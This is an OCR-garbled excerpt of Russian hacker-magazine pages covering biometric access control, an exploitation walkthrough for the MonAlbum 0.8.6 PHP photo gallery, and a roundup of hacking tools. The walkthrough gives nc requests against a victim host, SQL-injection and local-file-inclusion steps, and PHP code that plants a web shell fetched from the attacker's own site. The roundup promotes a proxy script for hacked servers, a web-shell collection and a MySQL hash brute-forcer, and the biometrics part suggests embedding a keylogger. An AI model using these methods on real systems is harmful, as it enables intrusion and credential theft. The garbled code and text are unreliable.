Система распознавания отпечатков пальцев, на первый взгляд, доста- 
точно сложна в реализации, но на самом деле это совершенно не так! 
Если в твоем железном друге есть сканер, то организовать такую СКД 
ты можешь и сам. Для этого тебе придется изучить технику работы с 
ТѴѴАІЫ-драйвером сканера и основы внедрения в механизм авторизации 
при входе в ОС ѴѴіпсіоѵѵб (ищем инфу по процессу ѴѴіпІодоп и библиотеке 




6ІЫА], то есть вопросы чисто технические. Несколько сложнее организо- 
вать распознавание отпечатка и сравнение его с эталоном: тут придется 
поднапрячь мозги (использовать нейронные сети, что есть круто, либо 
какие-нибудь меры, характеризующие разницу двух изображений, что не 
так надежно и не круто) или взять какое-нибудь стороннее ПО. 

Что касается обмана систем распознавания отпечатков пальца, то 
практически все системы, которые могут встретиться нам в быту, легко 
обходятся простым подсовыванием фотографии нужного (отнюдь не 
21-го) пальца. 

Другое дело — аппараты для доступа в серьезные учреждения. Эти 
системы помимо распознавания рисунка на пальце контролируют и 
другие его характеристики. Во-первых, датчики могут быть располо- 
жены пространственно, а не в одной плоскости, что сразу отсекает все 
попытки использования плоских изображений (зато можно подсунуть 
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гипсовый макет пальца). Далее, система может контролировать темпера- 
туру в некоторых характерных точках пальца. Ты, конечно, можешь сказать, 
что такой способ будет не очень надежным — сейчас я пришел с мороза, 
а вчера был в теплых перчатках. Что я могу на это ответить? Только то, что 
такие системы действительно существуют, и, значит, как-то они все-таки 
все это реализуют. Кроме того, можно измерять сопротивление некоторых 
участков кожи пальца и связанное с этой величиной значение электроста- 
тического потенциала. Как выясняется, сопротивление кожи зависит от ее 
толщины в этот месте, расположения кровеносных сосудов, распределения 
жира под ней и еще туевой хучи уникальных для каждого человека (и даже 
пальца!) параметров. Атут уже недалеко и до эффекта Кирлиана, на осно- 
вании которого некоторые шарлатаны выстраивают картины человеческой 
ауры. Согласно ихутверждениям, получается, что биометрическая система, 
контролирующая потенциалы на пальце, будет распознавать человека по 
его ауре! Не правда ли, надежный способ? :) 

Да что это мы все про отпечатки... Ведь есть еще уйма параметров тела 
человека, подходящих для надежного контроля его личности. Существуют 
системы, которые контролируют следующие параметры: 

• Геометрия руки (обычно кисти). Если контролю подл ежат толь ко очерта- 
ния кисти, то есть система является двухмерной (сканирование происходит 
только снизу), то ее легко можно обмануть, подсунув фото. Если датчики 
расположены в пространстве, но температура не контролируется — в аптеку 
за гипсом и ваяй! Короче, всетакже, как и с одним (средним) пальцем. 
•Радужная оболочка глаза. Ну-ка вглядись в отражение своего глаза в 
зеркальце — темный зрачококружен цветными радиальными узорами, ко- 
торые у каждого человека абсолютно уникальны! Кроме того, в этом случае 
глаз прислонять никуда не надо: его можно (автоматически) найти на фоне 
лица, сфотографировать с большим увеличением даже с расстояния поряд- 
ка метра, а затем распознать. Подделать трудно. Как это сделать — не знаю. 
•Рисунок кровеносных сосудов на сетчатке глаза (то есть внутри глаза). Вот 
как раз в этом случае глаз и надо засовывать в разные дырки, зато вероятность 
ложного приема практически равна нулю. По заверениям отдельных авторите- 
тов, это самые надежные (дорогие и неудобные) биометрические системы. 
•Геометрия лица, то естьтотже способ, который при узнавании другдруга 
используютобычные люди. Особенности те же, что и при контроле пальца 
и руки. 

•ДНК, но это очень долго и поэтому может применяться (пока!) для каких- 
либо несрочных экспертиз. 

В общем, все перечисленные системы делаются аппаратными, и стоимость 
их составляет 100 — 1 0 000 у.е., что не очень-то и малопри их серийной 
установке (например, на дверях в охраняемые помещения). 



0 ПОВЕДЕНЧЕСКИЕ БИОМЕТРИЧЕСКИЕ СИСТЕМЫ 

Этот класс СКД менее надежен, таккакоцениваетповедение человека, 
которое в принципе может меняться. Отсюда низкая точность работы этих 
систем. Но зато большинство из них могут быть программными, то есть не 
требующими специального аппаратного обеспечения. Крометого, их ра- 
бота можетбыть прозрачной для пользователя и непрерывной во времени, 
а значит, психологически удобной и не отвлекающей от привычной жиз- 
недеятельности. Итак, аутентификация может проводиться по следующим 
аспектам: 

• Голос. Способ — реально фигня! Записал чужой голосок на магнитофон 
— и готово. Плюс проблемы при простудах и перепоеу законных пользо- 
вателей (вот не знаю, каку других, а у меня после хорошего перепоя даже 
рисуноклиний на пальцах меняется — нето что голос). 

• Подпись. В принципе, подпись можетбыть выполнена стилусом на тач- 
паде, а при этом уже можно оценивать не только конечный результат, но и 
динамику его создания. 

• Клавиатурный почерк. Понятно, что у каждого пользователя есть свой 
сложившийся стиль набора текста, то есть интервалы между нажатиями 
каждой пары (а то и тройки) клавиш вовсе не случайны! Также можно оце- 
нивать время удержания каждой клавиши. 

• Характеристики работы с мышью. Кто-то любит двигать мышью 
неспешно по слегка закругленным траекториям, а кто-то делает это 
быстро и исключительно по прямой. Чем не критерий для идентифи- 
кации? 

• Некоторые психологические привычки пользователя. К примеру, кто-то 
любитнервно возить мышью, а кто-то скроллингом балуется. Особенности 
найдутся! 

И вот еще в чем привлекательность поведенческих систем: сделать 
такую СКД ты можешь легко и сам! Для этого подойдет любой язык 
программирования, который поддерживает создание приложений под 
ѴѴіпсІоѵѵз. 

Если ты выберешь более легкий путь, то достаточно один раз при 
старте Винды (или, может, при старте твоей защищенной программы) 
попросить пользователя ввести указанный ему текст. Поскольку при 
этом работа будет происходить исключительно в твоей собствен- 
ной программе, то париться особо не нужно — замерить промежутки 
между нажатиями можно хотя бы по времени прихода сообщений 
\Л/М_КЕУООѴѴІ\]. Затем эти интервалы нужно сравнить с эталонными 
значениями, которые были получены при наборе этой же фразы ранее. 
Сравнивать можно опять же двумя способами: с помощью какой-нибудь 
меры (Хемминга, Евклида — освежи матпознания на досуге) или с по- 
мощью распознающей нейронной сети (если ты еще не знаешь, что это 
такое, прочти обязательно где-нибудь в инете — это очень здоровское 
средство для распознавания любых образов). 

Однако так мы получим систему, работающую только один раз. А потом 
выйдешьты на пару минуток, а какой-нибудь гад подойдет ктвоему 
компьютеру и давай с него секретную инфу сливать — авторизацию-то 
ты уже прошел, она была однократной! Другое дело, если система будет 
непрерывной, то есть постоянно (и тихо) следящей за поведением 
пользователя. Тут уже надо продумать какой-то механизм получения 
глобальной информации о его действиях (ведь фокус ввода не все 
время будет в твоей программе). По мнению автора, наиболее опти- 
мальным для указанных целей является использование крючьев (хуков 
или механизма фильтрации сообщений) ОС ѴѴіпсІоѵѵз. Надо сказать, что 
установленный глобальный хук позволяет нашей программе (а точнее, 
библиотеке) перехватывать сообщения, отправленные всем работа- 
ющим программам, а значит, пока пользователь набирает очередную 
белиберду в ѴѴогсГе, наша программа непрерывно контроллирует его 
личность (кстати, сюда же можно и кейлоггер простой встроить). 

В общем, дерзай! Ты должен сделать нечто похожее, но круче! А что? 
Давай бабахай низкоуровневый драйвер клавиатуры, чтобы его вообще 
никак нельзя было обмануть, и чтобы еще туда можно было что-нибудь 
полезное впихнуть, и чтобы никто не догадался! 

Этим радостным призывом заканчиваю свое повествование и надеюсь, 
что кому-нибудь оно таки поможет в повышении своего образовательно- 
го уровня, а также в деле общего просвещения молодежи, цс 
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Разведение Интернета в домашних условиях 
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(ЗАЗОЮ «5ТЕР1ЛЧ» ВІСН 

/ С А50Ю@СМ АІІ..СОМ / 



•ШИБКИ 

м*ылі.вим 

СКРЫТЫЕ КЛЮЧИ АВТОЗАПУСКА 
В СИСТЕМНОМ РЕЕСТРЕ НАХОДИМ БАГИ 
В СЕМЕЙНОМ ФОТОАЛЬБОМЕ 




«Да ты хакер», — часто говорят мне знакомые и друзья. Но никто из них и не догадывает^ 
ся, как трудно стать матерым взломщиком и сколько надо прочитать, просмотреть исход- 
ников, чтобы наконец-то найти свой первый баг! У меня за спиной, конечно же, 
не один баг, но я с радостью готов вспомнить молодость и показать тебе последователь- 
ность анализа популярного самописного движка. Готов? Тогда отправляемся в путь! 



Г 



г ПРЕДЫСТОРИЯ 

Как-то раз ко мне в аську постучался знакомый и попросил найти уязви- 
мость на одном сайте (приводить название сайта я не буду). На ресурсе на- 
ходилось несколько страничек и форум — в общем, ничего особенного я там 
не нашел. Сайтбыл написан на РНР с поддержкой 5С1І_; на движок пока не 
хотелось тратить время, и я продолжил чисто поверхностное исследование. 
На сайте находился какой-то блог, но толку от него практически не было. 

Там же стояла непонятная фотогалерея МопАІЬит версии 0.8.6. Я решил 
ее исследовать и найти ошибки в коде. Собственно, всем известно, что 
безошибочных скриптов не бывает, просто надо очень внимательно изучать 
каждую часть кода. Таким образом я и решил найти баг (что мне в дальней- 
шем и удалось :)). 

^ ОСМОТР ПАЦИЕНТА 

Все мы любим свежие баги в популярных скриптах, тем более когда мы их 
сами находим. А еще приятнее, когда эти баги обнаруживаются в скрип- 
тах, установленных на раскрученных сайтах :). Для успешной реализации 
задуманного мне пришлось скачать МопАІЬит к себе на комп. Для этого я 
воспользовался поисковой системой ѵѵѵѵѵѵ.аооаіе.ги — это, на мой взгляд, 
самый лучший хакерский поисковик, о его возможностях не раз писали в 



«Хакере». Но, как говорится, на вкус и цветтоварищей нет. Так что юзай то, 
что предпочитаешьты. 

РНР-скрипт галереи представлял собой фотогалерею с поддержкой базы 
данных Му5СП_. Скрипт этот на просторах рунета не очень популярен, но в 
Западной Европетаких сайтов много, особенно в зоне .бе. 

Я скачал последнюю версию скрипта — 0.8.6. Лучше экспериментировать 
локально, поэтому на Винде я использую для этих целей йепѵѵег (хотя мож- 
но довериться и аналогичному по функциям ТорЗегѵег’у). 

Распаковав архив, яувидел следующие файлы/папки:_бос, абтіп, 
сопТ С55, ітадев, ітд, Іапд, ІіЬ, абтіп.рЬр, ітаде_адгапбіг.рЬр, ітаде_ 
бевсгірбоп.рЬр, іпбех.рЬр, іпБІаІІ.рЬр. Для установки движка я открыл 
в браузере файл іпзІаІІ.рЬр. Потом, бегло просмотрев файл іпбех.рЬр (я 
открыл его первым, потому что он іпбех), я ничего особенного не обнаружил 
и перешел к следующему файлу ітаде_адгапбіг.рЬр. Итутудача мнеулыб- 
нулась — я нашел первую Х55: 

есЪо "<ЬЦт1х1іеасІ>" ; 
іб ($з1і(іе && $пехбітаде) { 

есЪо "<МЕТА НТТР-Е01ЛѴ=КЕРКЕЗН 
С(ЖТЕЫТ= \ " $ б 1 і сіе ; 
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Веб-админка самопального хостинга на взломанном серваке 



ШЬ=ітаде_адгапбіг . ркр?іб_ітаде= 
$іб_гиЪ_зир&з1ібе=$з1ібе\ ">" ; 

} 

еско "<1іпк ге1=збу1езкееб буре= ' бехб/сзз ' 
кгеб= ' сзз/аІЬиш. сзз 1 хбіб1е>$дзібе</ 
бібіех/кеабхкобу Ъдсо1ог= 1 $драде ' >" ; 

Переменные $5ІісІе и $пехІі гладе перед приведенным 
кодом не фильтровались. Но это, к большому сожалению, 
особо ничего не давало. Поэтому я перешел к просмотру 
админки, и меня сразуже порадовал скрипт асІтіп/асІтіп_ 
акгесЬ_гиЬ.рЬр: 

еско "<ЪгхЪ>" ._ЬІЗТ_ОЕ_ВІК. "</Ъ> : <Ъг>"; 
$ргиЬгідие = $_РОЗТ [ "ргиЬгідие" ] ; 
іб (іззеб ( $ргиЬгідие) &&$ргиЪгідие ! =" " ) 

{ 

$гези1б = ехесибе_гедиебе ( "зеіесб іб_гиЪ , 
пот бгот топа1Ьит_гиЪгідие ѵікеге пот Ііке 
\ " $ргиЪгідие%\ " огбег Ьу пот" ) ; 

Ура! ЗОбчщесбоп! Но для эксплуатации нужны были права 
админа, а их еще надо было получить! Для проверки своих 
догадокя протестил эту 5СН_-инъекцию локально: 

>пс 127.0.0.1 80 

Р05Т /абтіп/абтіп_аббгеск_гиЪ.ркр НТТР/1.1 
НОЗТ: аІЬ 

Сопбепб-Ьепдбк: 15 
ргиЪгідие=11к ' 

И получил интересный ответ. По идее, после заголовков 
сервера никаких данных быть не должно, так как браузер сразу 
же переходитпо значению хидера босабоп. Но вопреки моим 
ожиданиям... 

НТТР/1.1 302 Еоипб 
Бабе: Ргі , 29 бип 2 007 11:21:21 СМТ 
Зегѵег: Араске/1 . 3 . 33 (Міп32) РНР/4.4.4 
Х-Роѵ/егеб-Ву : РНР/4.4.4 

Зеб-Соокіе : РНРЗЕЗЗІВ=а70Ъ5Ъ2705б20а83бс51 
64532е9с833б; рабк=/ 

Ехрігез: Тки, 19 Ыоѵ 1981 08:52:00 СМТ 
Саске-Сопбгоі : по-збоге, по-саске, тизб- 
геѵаіібабе, розб-скеск=0 , рге-скеск=0 
Ргадта: по-саске 

Ьосабіоп: кббр: / /а1Ъ/абтіп/1одіп_раде . ркр 

<кбт1хкеасіх1іпк ге1=збу1езкееб 

буре= 1 бехб/сзз ' кгеб= ' . . /сзз/аІЬит. сзз 1 х/ 

кеаб> 




<Ьоб.у Ъдсо1ог= ' РРРРРР ' хбаЫе Ъогбег=0 
се11зрасіпд=3 міббк=600хбгхбб Ъдсо1ог=# 
999999 ™іббк=100%хбаЫе Ъогбег=0 
се11зрасіпд=0 се11раббіпд=3 
тббк=100%хбгхбб 
Ъдсо1ог=#ВЕВЕВЕхсепбег>Зеагск бог 
бігесбогіез</сепбегх/ббх/бгх/баЫех/ 
баЫ 

ехЬгхбогт тебкоб= ’розб ' асбіоп=абтіп_ 
аббгеск_гиЬ.ркрхіприб буре= "кіббеп" пате 
= " РНРЗЕЗЗІВ" ѵа1ие= " 42 6б84бЪ7а48с04а98са48 
5837бЪбб5е" /> 

</ббхббхіприб буре= ' бехб ' 
пате= 1 ргиЬгідие ' > 

сіприб буре= ' зиЬтіб ' ѵа1ие= ' Зеагск ' > 
</богтхЪгхЪ>Ьізб об бо1бегз</Ъ> : <Ьг>ха 
кгеб=абтіп_аз оибег_ги 

Ъ.ркр?іб_гиЪ=1&РНР5ЕЗЗІВ=426б84бЪ7а48с04а9 
8са485837бЪбб5е>444</ахЪг>ха кгеб=аб 
тіп_а;іоибег_гиЪ.ркр?іб_гиЪ=0&РНРЗЕ35ІВ=42 6 
б84бЪ7а48с04а98са485837бЪбб5е>Ттр</ах 
Ьг> <ЬгхЬгхЬ>2</Ь> гезиІбзс/Ъобух 
/кбт1> 

«Вот это да !» — подумал я. Хотя в ответе сервера и нет 
указания на ошибку в запросе, но ясно, что скрипт 
выполняется дальше, даже если нет прав админа. 

А значит, надо найти файл, отвечающий за ввод или 
вывод настроек. И вот тот самый файл абтіп/ 
абтт_сопкдигаПоп.рЬр. Смотрим дальше и видим 
следующее: 

іпс1ибе( " . /зесиге.ркр" ) ; //инклудим файл 
зесиге .ркр 

$д1апдаде = $_РОЗТ [ ' діапдаде ' ] ; 

//язык, вот здесь интересно 
іб ( ! іззеб ( $д1апдаде) ) іпсіибе ( " . . / 
сопб/сопбід . іпс .ркр" ) ; // іпсіиб раз дб 
заиѵедагбе, ну здесь конфиг инклудится 
іпсіибе ( " . . /ІіЬ/аІЬит. іпс" ) ; // какая-то 
библиотека 

іпс1ибе_опсе ( " . . /1апд/$д1апдаде" ) ; // ло- 
кальный инклуд ! 

$тоб = $_РОЗТ [ ' тоб ' ] ; 

//дальше идет вывод настроек МопАІЬит. . . 

Вот ключик кадминке! Теперь получить шелл на сайте было 
делом техники. Что касается файла зесиге. рЬр, то в нем не 
было ничего, кроме: 

зеззіоп_збагб ( ) ; 

іб (! іззеб ( $_ЗЕЗЗІОЫ [' пате ']) ) 

кеабег ("Ьосабіоп: кббр://" . $_ 

ЗЕРѴЕР [ ' НТТР_НОЗТ ' ] . бігпате ( $_ЗЕРѴЕР [ ' РНР_ 
ЗЕЬР ' ] ) . " /1одіп_раде .ркр" ) ; 



> іп^о 

К твоему сведению, 
на запрос «Роѵѵегеб 
Ьу МопАІЬит зке:. 
сіе іпигбіпсІех.рЬр» 
Гугл выдал мне кучу 
сайтов. 



Счастливым вла- 
дельцам галереи 
МопАІЬит я бы 
порекомендовал 
пропатчить файл 
зесиге. рЬр либо пол- 
ностью отказаться от 




> Ііпкз 

По ссылке Ыбр :// 
Ь4гкеѵі[.огд/зр[оіб 
Ыті можно найти 
сплоит для этой 
уязвимости. Сплоит 
до написания статьи 
находился в стро- 
жайшем привате, но 
для тебя мы откроем 
этот «железный 
занавес». 

Последняя версия 
скрипта 0.8.6с 
доступна на сайте 
ѵѵѵѵѵѵ.ЗсІзгс.сот/ 
топаіЬит. 



V 
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Внешний вид МопАІЬит 



I 



Главная страница фотогалереи 



МопАІЬит 



Код всего л ишь перенаправлял юзера, если тот был не в сессии админист- 
ратора. Самое интересное, что в коде отсутствовали инструкции сІіе() и ехіі, 
хотя по соображениям безопасности они должны были быть! Остальные 
инклуд-файлы, судя по их названиям (../соп^/сопбд.іпс.рбр, ../ІіЬ/аІЬит.іпс), 
не представляли интереса. 

Строчка «іпсІис!е_опсе("../[апд/$дІапдаде м )», расположенная в файле 
ас!тіп_сопбдигабоп.рбр, не должна была вызвать какие-то проблемы, 
даже если $_Р05Т[ , д^апдаде , ] ссылался бы на несуществующий файл 
(можно считать, что это локальный іпсіисіе-баг). Вместе с отсутствием сііе 
это были два очень серьезных бага. 



Дальше заходим браузером на абтіп/ас!гпіп_сопбдигабоп.рбр, сохра- 
няем страницу на жесткий диск, удаляем из паги <іпри{1:уре="ЫсІсІеп" 
пате="тосГ> и меняем оеіесі пате="дІапдаде”>, аточнее, значение 
одного из <орбоп> на название нашего файла «../ітадез/збдрд» (не забудь 
изменить параметр асбоп формы корректным значением). 

Теперь перезагружаем страничку, выбираем нужный нам язык и отправ- 
ляем форму на сервер. Но это не получится, если в настройках запрещен 
удаленный инклуд файлов. В случае такого досадного рестрикта, поступим 
следующим образом: 

Приготовим два файла. Первый — збі Дрд : 



^ НАПУТСТВИЕ ПЕРЕД БОЕМ! 

Итак, благодаря поверхностному изучению движка, мы имеем возможность 
просмотреть все настройки скрипта, включая логин и пасс админа, а также 
данные для подключения к БД, потому как скрипт продолжает выполняться 
после перенаправления браузера (хидер Босабоп). Теперь попробуем, за- 
юзатьбагна практике. Но уже нелокально, а удаленно, выбрав себе жертву 
через боодіе. 

Щ ЭКСПЛУАТАЦИЯ БАГА 

И вотя придумал, какзалить шелл, что оказалось очень просто. Но все по 
порядку. Сначала надо получить доступ к админке. Делаем следующее: 

>пс Ѵ'тѵллг. ѵісЬіш. ги 80 

СЕТ /шопа1Ьиш/а(Зшіп/абтіп_сопТідигабіоп.р]ір НТТР/1.1 
НОЗТ : Ѵ'Ллтѵ'7 . ѵісБіго . г и 



<?рбр 

зузбеш("шѵ . . /Ішадез/з1і2 . зрд . . /ішадез/ххх.рЬр" ) ; 
йіе ( ) ; 

?> 

И зЬ2дрд — сам шелл. 

Файл зЫдрд после обращения кнему должен переименоватьзЬ2дрд в 
ххх. рбр. Залив их обоих на сервер жертвы описанным выше способом, 
воспользуемся инклудом, и скриптсработает! 

Зайдя на пагу ѵѵѵѵѵѵ.ѵісбт.сот/топаІЬит/ітадез/ххх.рбр, я увидел 
долгожданную картину. Но потом испугался, что придется отвечать за со- 
деянное, и ушел со страницы восвояси. И при этом я не забыл удалить все 
файлы, кроме самых нужных. Потом было пиво, водка, девушки, защита 
диплома, а главное — свобода! В общем, все остались довольны, и никто 
не пострадал :). тг 



После этого НТТР-запроса сервер выполнит РНР-скриптасІтіп_ 
сопбдигабоп. рбр. Тот вернет НТМБ-код, который будет объединен с 
ответом сервера. В куче НТМБ-кода есть раззѵѵогсі и Іодіп админа. Нашел? 
Молодец! Теперь заходим в админкуѵѵѵѵѵѵ.ѵісбт.ги/топаІЬит/асІтіп.рбр. 
И заливаем на сервакследующий файл: 

<?рЪр 

$Т=Тореп ( " . . /ішадез/зЬ.рІір" , "ілг" ) ; 

ГриЦз ($Т, "<?р]ір іпсіисіе (Ѵ'ЫсЪр: //ту_зіБе/ 
зЪ. БхЦ\ " ) ; ?>" ) ; 

Тсіозе ( $Т) ; 
йіе ( "уеаЫ " ) ; 

?> 

Здесь, какты сам догадался, збТхІ: — твой любимый РНР-шелл. После 
закачки я получил кучу предупреждений по поводу невозможности опре- 
делить разрешение файла, тип картинки ит.д., нофайлуспешносохранил- 
ся в папке /ітадез. 
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ПРОГРАММА: Н Р - А N О N V М 1 2 Е К 
ОС:УІІЧ/*МІХ 

АВТОР: МАЛЫГИН АЛЕКСАНДР 




Анонимный серфинге КПК 



Казалось бы, об анонимном серфинге сказали 
уже все и не один раз. Но нет, проблемы на этом 
фронте по-прежнему остаются. «Какие могут 
бытьтраблы, когда кругом полно соксов/ 
ѴРЫ/проксиков?» — спросишьты и получишь 
очередную оплеуху :). Дело в том, что иногда 
юзать вышеперечисленные средства попросту 
не представляется возможным. И речь вовсе 
не о том, что кто-то хочет поджать 30 баксов, 
не отдавая их на оплату сокс-сервиса, — все 
гораздо серьезнее. 

Тот, кто использует КП К для работы в Сети, 
наверняка пойметменя с полуслова. Ведь 
проблема не нова: найти удобный и функцио- 
нальный ѴРЫ -клиент под мобильный девайс за- 
частую достаточно сложно, а о соксификаторах 
я вообще молчу. В то же время подавляющее 
большинство браузеров под ѴѴіпсіоѵѵб МоЬіІе (ІЕ, 
Орега, Міпіто, ѴѴеЬЬу, еіе) напрочь отказывает- 
ся дружить с проксиками. В этом мне пришлось 
убедиться на собственном опыте. После долгих 
мучений я таки выискал браузер ЫеіРгопІ:, кото- 
рый (о чудо!) поддерживал работу через прокси. И 
все бы ничего, но софтинка глючила так часто, что 
терпению моему быстро пришел конец. Я пере- 
рыл в рунете солидную часть порталов, посвя- 
щенных КПК, и был вознагражден за труды. Удача 
носила скромное название — РНР-апопутііег 
и являла собой РНР-скрипт. Для того чтобы 
развеять твои сомнения в полезности утилиты, 
коротко поясню: тулза заливается на поломанный 
сервер, и впоследствии все соединения идутче- 
рез нее. Веб-интерфейс скрипта незамысловат и 



выражен лишь одним полем — адресной строкой. 
Какты, наверное, понял, РРІР-апопутігег играет 
роль некоего промежуточного браузера между 
нами и атакуемым хостом :). При этом наш ІР- 
адрес остается в полной безопасности, поскольку 
в логахжертвы отмечается ІР’шниксервера, на 
который залит скрипт. 

Изособенно сте й ути л ы сто ит отм етить с л е ду ю щи е : 



• работает при включенном на серве- 
ре режиме заТе шобе; 

• поддерживает розб- запросы, 

Ьазіс- авторизацию, боѵшіоаб и 
иріоаб файлов; 

• поддерживает сессии и кукисы; 

•не использует временные файлы; 

• не требует разрешения на запись 
на сервере; 

• не требует установки; 

•малый вес (порядка 22 Кб) . 



Как видишь, скриптспособен выполнять возло- 
женные на него задачи в самых суровых боевых 
условиях. Для успешного функционирования 
подойдет практически любой веб-шелл, коих в 
твоей коллекции, уверен, не один десяток :). Так 
что воттебе еще одно средство обеспечения 
анонимности в твою копилку. Надеюсь, теперь 
ты действительно сможешь спать спокойно :]. 
При желании скрипт можно проапдейтить 
своими руками (например, замутить закладки), 
но учти, что для этого эти самые руки должны 
быть прямыми :). 

ПРОГРАММА: ЕЮСІЕК 
ОС:У№ОѴ320ОО/ХР 
АВТОР: ЕКІС І_АѴКЕІЧСЕ 

Часто ли ты имеешь дело с различными дебаг- 
герами? На этот вопрос все ответят по-раз- 
ному, но суть будет одна: дебаггер дебаггеру 
рознь :). Наверняка, ты хоть разок «держал в 
руках» 0 Ну ОеЬиддег или нечто ему подобное. 
На самом деле отлаживать можно все что угод- 
но, вплоть до веб-приложений... Так вот здесь 




Юзаем веб-дебаггер 



стоп, наша остановка :). Почему я заговорил о 
вебе? Все элементарно. Примитивными бага- 
ми уже никого не удивишь, да и встречаются 
они все реже и реже. А вот дебаггинг НТТР-за- 
просов представляет собой весьма забавную 
вещь (правда порой и изрядно геморройную). 
Но, как известно, от сумы и от тюрьмы... 

В общем, первое, что нам потребуется, — это 
хороший, функциональный инструмент, 
поэтому сне го и начнем. Одним из ярких 
представителей таковых является софтина 
под названием РісІсІІег. Тулза имеет огромное 
количество настроек и подходит для наших 
целей как нельзя лучше. Чтобы ознакомить 
тебя с этим зверем, приведу краткий перечень 
прибамбасов утилы: 



• возможность ручной правки НТТР- 
хидеров ; 

• поддержка методов СЕТ , РОСТ , 
НЕАБ, ТРАСЕ, еРс ; 

• встроенный прокси-сервер; 

• отображение всевозможной инфор- 
мации о соединении и транспорти- 
ровке НТТР-пакетов ; 

• автоматическая подмена поля 
ІІзег-АдепЦ (ІЕ 6,7, ЫебЗсаре 3, 
РігеЕох 1.5) ; 

• ведение полного лога коннектов . 



Какты понял, РісІсІІег представляет собой 
полноценный веб-дебаггер, изначально пред- 
назначенный для отладки веб-приложений 
кодерами. Ріо, смею заверить, и наш взгляд он 
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будет радовать еще долго :). Особенно ценная 
фичатулзы — встроенный прокси-сервер, 
который ведет лог в удобочитаемом виде. 
Настройка не вызоветзатруднений: юзаем 
дефолтный порт 8888, пускаем Оперу/Ослика/ 
Лису через РгееСар с нормальным соксом, а в 
свойствах браузера вбиваем дополнительный 
НТТР- прокси вида 1 27.0.0.1 :8888. Все, теперь 
дебаггер готов ктруду и обороне (то есть к 
нападению :)). 

Как редактировать заголовки пакетов, я рас- 
сказывать не буду. Об этом ты еще прочитаешь 
на страницах нашего журнала (смотри рубрику 
Еазу Наск). Единственное, что хотелось бы 
добавить, — неленись ковырять подобным об- 
разом движки, использующие Р05Т-запросы, 
ведь зачастую именно так находят спрятанные 
от посторонних глаз 50Е-инъекты и прочие 
аппетитные баги :]. 

ПРОГРАММА: 5НЕИ СОНЕСТІОМ 
ОС: УІІЧ/*ІЧІХ 
АВТОР: АІ_І__ІІЧТЕКМЕТ =) 




Какты помнишь, в каждом выпуске Х-Тооіз я 
обязательно выкладываю по одному новому 
веб-шеллу. С чем это связано, я уже объяс- 
нял. Ведь действительно очень сложно найти 
удобный и функциональный инструмент, зато- 
ченный под свои нужды. Тем не менее сегодня 
я решил чуть-чуть отойти от сложившейся в 
Х-Тооіз традиции и выложить буквально все, 
что можно найти на просторах рунета и за их 
пределами :). 

Побродив по хак-бордам и обратившись к 
людям из контакт-листа своей аси, я таки сумел 
собрать наиболее полную коллекцию веб-шел- 
лов. Причем в сборнике присутствуют та кие 
экземпляры, о которых ты запросто мог вообще 
не слышать в силу нераспространенности 
скрипта или его приватности. Но если ты дума- 
ешь, что эта коллекция собрана исключительно 
из РНР- шеллов, то сильно ошибаешься. Все 
накопленное я разделил на три группы: РНР, 
Регі и А5Р — в из них лежатскрипты, написан- 
ные соответственно на РНР, Регі и А5Р :). Для 
того чтобы не пустословить, коротко опишу 
содержимое каждой диры ЗЬеІІ Соііесііоп: 



1. А5Р 

— СпкЗАвр 

— СуЬегЗру 5 

— Кетоіе Ехріогег 

— 2е1ііг 4 и т . д . 

2. Регі 

— Со 

— ССІ-ТеІпеЕ 

— Сагпша МеЪ ЗЬеІІ 



3. РНР 

- СуЬег ЗЬеІІ 

— БхЗІтеІІ 

— РгесІаДог 

- СРЗ Ѵ7еЬ-ЗЬе11 

- №М 

— РооЕ ЗНеІІ и т.д. 



По причине экономии журнального места я не 
стану перечислять в тексте статьи все веб-шел- 
лы, однако отмечу, что среди РНР-скриптов 
ты найдешь несколько малоизвестных версий 
популярного С995Ье11, веб-шелл от2аСо 
— Зтаіі РНРѴѴеЬ ЗЬеІІ Ьу 2а Со, релиз от Анти- 
чата — АпІісЬаІ ѴѴеЬ-ЗбеІІ ѵ. 1 .5 Ьу Огіпау и еще 
много всего интересного. Всего мнеудалось 
собрать порядка 37 различных веб-шеллов, но 
я надеюсь, что это не предел и коллекция будет 
постепенно пополняться (в том числе и твоими 
усилиями :)). Ну а пока смело сливай архив с 
нашего ОѴО и ищи то, что хоть немного скрасит 
твою ежедневную рутину :]. 

ПРОГРАММА: МѴЗОЬ ЕАЗТ 
ОС: У11Ч/*И1Х 




Компактный Си-код брутера 



Описывая эту тулзу, я даже не буду спрашивать, 
волнует ли тебя проблема брута :]. В какой-то 
степени она касается всех, вопрос лишь втом, 
что и чем брутить. На страницах ][ неоднократно 
выкладывались всевозможные брутфорсеры 
мыл, асей, ЕТР и прочего. Но сейчас я бы хотел 
заострить твое внимание на переборе мускуль- 
ных хэшей, так какэта тема освещена меньше 
всего. 

Какты знаешь (или догадываешься :)), в МуВОЬ 
пароли либо шифруются алгоритмом 5НА-1, либо 
преобразуются в Му5С1І_-хэш. Первый по дефолту 
включен в состав мускула пятой версии и выше, 
а второй ты можешь встретить во всех предыду- 
щих (опять же при определенном расположении 
звезд на небе и соответствующей фазе луны :]). 
Отом, кактрудно брутить пассы, шифрованные 
5НА-1 , я и говорить не буду, попробуешь — сам 
поймешь. 

А вот с мускульными хэша ми расклад особый. 
Тебе не придется тратить уйму времени и сил, 
если под рукой будет МуВОЬ Разі — лучший 
брутер в своем роде. Написан он полностью 
на всеми нами любимом Си, распространя- 
ется фриварно.асорец полностью в твоем 
распоряжении :]. Одним словом, сказка. 
Теперь пару слов о том, как этой самой сказкой 
пользоваться: 



1. Компилим с помощью дсс в никсах: 



[г0ісІ@1оса11іоз1:] дсс туздібазі: . с 
-о туздИазЕ 



2. Запускаем: 



[гОісШІосаІЪозІ:] шуздИазЕ 
6294Ъ50б67ес1а209 

НазЪ: 6294Ъ50Е67е<іа209 
Тгуіпд ІепдДЬ. 3 
Тгуіпд ІепдСЬ. 4 
Рошхіразз: Ьагб 



Вот, собственно, и все. Кстати, при желании юзать 
тулзу можно и в Винде. Для этого лучше всего 
скомпилить ее с помощью ЬСС. Как? Смотри в 
прошлых выпускахХ-ТооІз. От себя добавлю: 
выручала программа меня не раз. Впрочем, 
воспользовавшись ей, ты и сам по достоинству 
оценишьее. 

ПРОГРАММА: ЗЫРЕР ТЕХТ ЗЕАКСН 
ОС: У №ОУ 3 2000/ХР 
АВТОР: СІ-ЕММ АЮОТТ 




Файло от нас не уйдет 



Как часто ты пользуешься стандартным 
виндовым поисковиком? Да-да, я протот, 
что выпрыгивает по < ѴѴі п - Р> . Что? Долгий, 
неудобный и вообще лажа? :) Тогда спешу 
тебя обрадовать: сейчас я представлю твоему 
